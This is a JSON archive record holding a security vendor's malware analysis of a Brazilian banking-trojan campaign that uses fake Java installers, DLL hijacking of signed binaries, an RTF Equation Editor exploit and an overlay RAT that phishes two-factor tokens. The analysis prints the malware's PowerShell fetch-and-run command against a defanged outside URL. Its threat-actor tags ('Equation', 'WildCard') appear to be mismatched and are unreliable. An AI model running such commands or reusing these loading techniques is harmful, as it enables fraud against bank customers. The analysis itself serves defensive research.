{
	"id": "2cf97692-2cd7-4830-87a7-55ece2165663",
	"created_at": "2026-04-06T00:12:22.179419Z",
	"updated_at": "2026-04-10T13:12:34.504204Z",
	"deleted_at": null,
	"sha1_hash": "852f2a018f576ed0fef6c0301e93e15ae0045367",
	"title": "VAI MALANDRA: A LOOK INTO THE LIFECYCLE OF BRAZILIAN FINANCIAL MALWARE: Part one",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4362808,
	"plain_text": "VAI MALANDRA: A LOOK INTO THE LIFECYCLE OF BRAZILIAN FINANCIAL MALWARE: Part one\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 20:27:26 UTC\r\nResearch by: Assaf Dahan\r\nFor more than a decade, Brazil has been one of the most active arenas of financial scamming, a fertile ground for banking Trojans and social engineering attacks. Brazilian threat actors have proven creative and up-to-date with global offensive methods and trends, and utilize them in a variety of ways to target the Brazilian market and Portuguese speakers. We have observed an evolution in the tools, techniques and procedures (TTPs) used by the attackers, who constantly alter and improve their delivery techniques to evade traditional security products and remain undetected. One of the more interesting techniques used by the group in recent years is the extensive abuse of trusted and signed binaries from reputable companies such as HP, NVIDIA, RealTek and VMware to cloak malicious code that's either loaded via DLL hijacking or injected into trusted applications.\r\nCybereason has been observing the Brazilian threat landscape and tracking several recent campaigns. Using AI-based behavioral detection, we uncovered and analyzed the lifecycle of interesting and stealthy attacks, which we'll discuss in this blog.\r\nCheck out Team Nocturnus' other research on Brazilian financial malware\r\nOverlay RAT Campaign\r\nWe recently observed an interesting multi-staged campaign using a myriad of techniques to keep the activity under the radar. This campaign uses social engineering to infect the victim’s machine with a variant of a financial malware that's often referred to as Remoto RAT. This malware gives attackers full control over the victim’s machine and can circumvent the two-factor authentication methods used by many Brazilian financial institutions.\r\nInfection Vector 1: Fake Java Installer\r\nCybereason telemetry caught a suspicious download of a fake Java installer that originated from the user’s browsing in the Chrome browser:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 1 of 20\r\nThe IP address resolves to the following domain:\r\nThe website is clearly a phishing site that mimics a legitimate Java download website and is localized to target Brazilian users:\r\nThe unsuspecting users are persuaded to download the Java update, which contains the following Zip file:\r\n7-Zip command line when the user unzips the archive:\r\n\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"C:\\Users\\[REDACTED]\\Downloads\\Java-install6375727.zip\"\r\nThe Zip file contains a suspiciously tiny executable (10KB):\r\nJava.exe (SHA-1: 75A29FEC62A95B4C820454CD82DDF70742A67602)\r\nStatic analysis of the executable reveals more suspicious features, such as the file description:\r\nAs well as the PDB path that points to “HowToRunPowerShell”:\r\nThis PDB path obviously references a publicly available code project, whose topic is “How to run PowerShell scripts from C#”:\r\nIronically, the java.exe file is written in .NET, as shown by the compiler signatures:\r\nThe .NET binary is obfuscated. However, after deobfuscating it, plain-text C# code can be observed. The tiny executable has a sole purpose: to download a secondary payload:\r\nThe execution of the fake Java installer, as shown in the Cybereason user interface, spawns cmd.exe and a PowerShell downloader:\r\nThe downloader attempts to download an image file:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C powershell -nop -c \"iEx(New-Object Net.WebClient).DownloadString('hxxps://cl[.]ly/f6f5fac35d25/download/testepepeu.jpg')\"\r\nThe image file is in fact an obfuscated PowerShell script.\r\nTestepepeu.jpg - 934BF6E81040089253C209A6B4286A235C240473\r\nThe PowerShell script is almost identical in terms of structure, strings and naming conventions to previously documented scripts associated with Brazilian and Chilean campaigns.\r\nPrior to downloading the secondary payload, the PowerShell script also conducts a few sanity checks, such as checking whether it runs on a virtual machine (VMware, VirtualBox, etc.).\r\nAs seen, the code has many Portuguese language references, further affirming that the threat actors speak Portuguese.\r\nThe purpose of the PowerShell script is to download, extract and execute the contents of another Zip file called “open.zip”, as well as an SSL certificate, behavior typically observed in financial malware:\r\nOpen.zip - 7C5F9C7541FE56FA11703156086D9F9D9C735800\r\nEven though the Zip file is not password protected, the antivirus detection rate is very low:\r\nThe Zip file contains these three files:\r\nPayload Analysis: Abusing A Trusted Binary\r\nFile name | SHA-1 hash | Purpose\r\nNvstlink.exe | 7FF99C01BADAD20BF153483E31BDEAD611D6D203 | Legitimate and signed NVIDIA executable.\r\nOPENGL32.DLL | 8E12FF6CFC217D5C9A6D1A7487634E50ABEB672E | Fake DLL side-loaded by the signed NVIDIA executable. Decrypts the main payload and loads it into memory.\r\nSoungs.config | 0EA42E64F4C8653D865EEA79EB3B37B81206CAC1 (Unknown to VT) | Encrypted malware payload.\r\nThe attackers are using a well-known technique called DLL hijacking to abuse a vulnerable signed and trusted binary. This technique was previously observed in the context of Brazilian financial malware to exploit an AutoIt binary.\r\nIn this instance, the attackers chose an authentic, signed NVIDIA binary (nvstlink.exe), which is vulnerable to DLL hijacking:\r\nNvstlink.exe’s import table shows that it will attempt to load OPENGL32.DLL upon execution.\r\nThe attackers specifically replaced the original OPENGL32.DLL, required by the executable, with a fake OPENGL32.DLL, which will attempt to locate the file “soungs.config” within the same folder, decrypt its contents and load it into memory:\r\nThe decrypted payload is mapped into three memory regions within the memory space of nvstlink.exe. The first one (0x3530000 - RW) is the PE header and the second one (0x3531000 - RWX) is the executable part of the payload. The third part is a copy of the whole executable (RW):\r\nInfection Vector 2: RTF Document Weaponized with CVE-2017-11882\r\nWe observed another infection vector that also relies on social engineering to trick a user into opening a Word document that's actually an RTF document.\r\nhttps://www.virustotal.com/#/file/e7b96141c68d215a249abfe8f70ceb3ef934d1857ebae70953dc30a0b542ad06/detection\r\nExamining the RTF document with Didier Stevens’ rtfdump.py, using the command rtfdump.py -f O [file], we can see three entries with embedded objects:\r\nWe can see a reference to two entries called “Equation.3”, further suggesting the usage of the infamous Equation Editor exploit (CVE-2017-11882):\r\nDumping and decoding the embedded section, we can see the following payload split between the entries.\r\nPowerShell payload found in section 7:\r\nDropped payload in the %tmp% folder, invoking a PowerShell downloader:\r\nExecution of the dropped “love.bat” script found in section 10:\r\nThe downloaded .png file is actually a PowerShell file with a very low detection rate:\r\nhxxps://cl[.]ly/0b2E2g2c3y2L/download/newpepe.png\r\nhttps://www.virustotal.com/#/file/ba203c49d639b4de69c31cea2c378d255a0318e133d9e859c8786dae2ce5445e/detection\r\nThe PowerShell script is almost identical to the PowerShell script seen in the first example, with a few changes in file names and URLs:\r\nThe PowerShell script will download, extract and execute the contents of a Zip file called “new10.zip”:\r\nhttps://www.virustotal.com/#/file/5f07d1b49b6b32d8b966f4c3c6694d10822746f80c1a4a494440bf913e934cd9/detection\r\nFile name | SHA-1 hash | Purpose\r\nhpdriver.exe | 4F66783ACE879E221C0DB62A92C21FFE587F7B3B | Decrypts, loads and injects the content of “security.config” into nvstlink.exe.\r\nnvstlink.exe | 11942D70B3180C860778F160F15EB4ABC4B159D9 | Authentic binary signed by HP. Used as a non-suspicious host for the injected malware code. Original file name “LHBeacon.exe”.\r\nsecurity.config | 2335F8CFAC306406929459B8A21047F007A7908F | Encrypted Overlay RAT payload.\r\nHpdriver.exe - AutoIt Loader Analysis\r\nStatic examination of the binary’s strings indicates that there’s an embedded AutoIt script:\r\nSearching through the resource section, an RCDATA section is identified containing the script in its compiled format:\r\nUsing the tool Exe2Aut, it is possible to decompile it back to the script, which spans more than 6,765 lines of code.\r\nAnalysis of the script shows that many parts of the code were copied “as is” from publicly available coding projects, for example:\r\n“Subrogation.au3”\r\nDataloader\r\nThe script serves as a loader and does the following:\r\n1. Locate and decrypt the contents of “security.config” (RAT payload)\r\n2. Load and map the decrypted loader binary to memory, executing the exported function “x”:\r\n3. This function locates nvstlink.exe using a wildcard search:\r\n4. Once found, nvstlink.exe is launched using CreateProcessA in suspended mode:\r\n5. Then it locates the resource “MYHOOK” and loads it into memory:\r\nExamining the “MYHOOK” resource in RT_RCDATA (SHA-1 5C1AD7C4CD06316172E4AA579C9EB9159C72DBAA) shows that it is in fact an embedded DLL, which contains the RAT payload. Based on the language setting, it was likely compiled in Brazil:\r\n6. Inject the decrypted RAT DLL into the suspended nvstlink.exe, following a classic code injection API chain:\r\n7. Resume nvstlink.exe and exit.\r\nThe injection was also caught by the Cybereason platform.\r\nCybereason flags suspicious and malicious behavioral patterns, such as code injections and memory manipulations:\r\nIt’s interesting to note the difference between infection vectors one and two. In both cases the attackers are exploiting the trust given to signed binaries, and use those applications to conceal the RAT’s malicious code. However, there is a difference in the implementation. In infection vector one, we see classic DLL hijacking. In infection vector two, we see code injection.\r\nWhat stands out even more is that the attackers refrained from injecting code into Windows host processes (such as explorer.exe or svchost.exe) and chose to download a signed and trusted third-party application, only to inject malicious code into it, probably hoping that it would look less suspicious.\r\nOverlay RAT Analysis\r\nAfter dumping the relevant memory region and fixing it, we get an unpacked and decrypted payload, which can now be analyzed. The dumped payload is written in Delphi, which is consistent with other reports about the RAT:\r\nThe compilation date refers to August 2018:\r\nExamining the dumped file sections, we can see that the largest section is the .rsrc section:\r\nGoing over the resources, inside the RT_RCDATA section, we can see over 20 images with Portuguese text:\r\nEach image contains a message from a bank or financial institution operating in Brazil and requests that the user submit either a two-factor token or a password for security reasons. The reason for storing those images lies in image-based phishing, a very popular technique among Brazilian cybercriminals. The malware uses a transparent browser screen overlay, tricking the unsuspecting user into submitting either the token or the credential, thus circumventing two-factor and other out-of-band security checks.\r\nExamples of images found in the unpacked binary:\r\nSantander Bank message:\r\nBanco do Brasil message:\r\nItau Unibanco message:\r\nOther notable targeted Brazilian financial institutions include:\r\nBanco Bradesco\r\nSicredi\r\nUnicred do Brasil\r\nSicoob\r\nBanco de Inter\r\nBanco de Nordeste\r\nBanco Mercantil do Brasil\r\nCaixa Economica Federal\r\nThe malware hooks the user’s browsers and monitors any access to financial institutions found in its configuration. The malware strings are kept encrypted in memory, and decrypted once the target website has been accessed.\r\nThe unpacked binary also includes the strings of the servers that the malware communicates with:\r\nIt is interesting to see that even the unpacked RAT binary had a relatively low detection rate on VirusTotal:\r\nhttps://www.virustotal.com/#/file/3b688c523a18408cc65866f6447e71d1148c198fcd6251c290ae53c90f766946/detection\r\nConclusion\r\nIn this blog, we reviewed a campaign that shows how Brazilian cybercriminals target the customers of financial institutions. While abusing legitimate binaries through code injection, DLL hijacking, RTF exploits and PowerShell downloaders is not a new technique, using them together along with elaborate social engineering creates a very effective multi-stage infection chain.\r\nIn our second blog (look for it in the coming weeks), we will look at other Brazilian campaigns that target financial institutions and use even stealthier techniques to evade detection.\r\nIndicators of Compromise\r\nSource: https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking"
	],
	"report_names": [
		"brazilian-financial-malware-dll-hijacking"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434342,
	"ts_updated_at": 1775826754,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/852f2a018f576ed0fef6c0301e93e15ae0045367.pdf",
		"text": "https://archive.orkl.eu/852f2a018f576ed0fef6c0301e93e15ae0045367.txt",
		"img": "https://archive.orkl.eu/852f2a018f576ed0fef6c0301e93e15ae0045367.jpg"
	}
}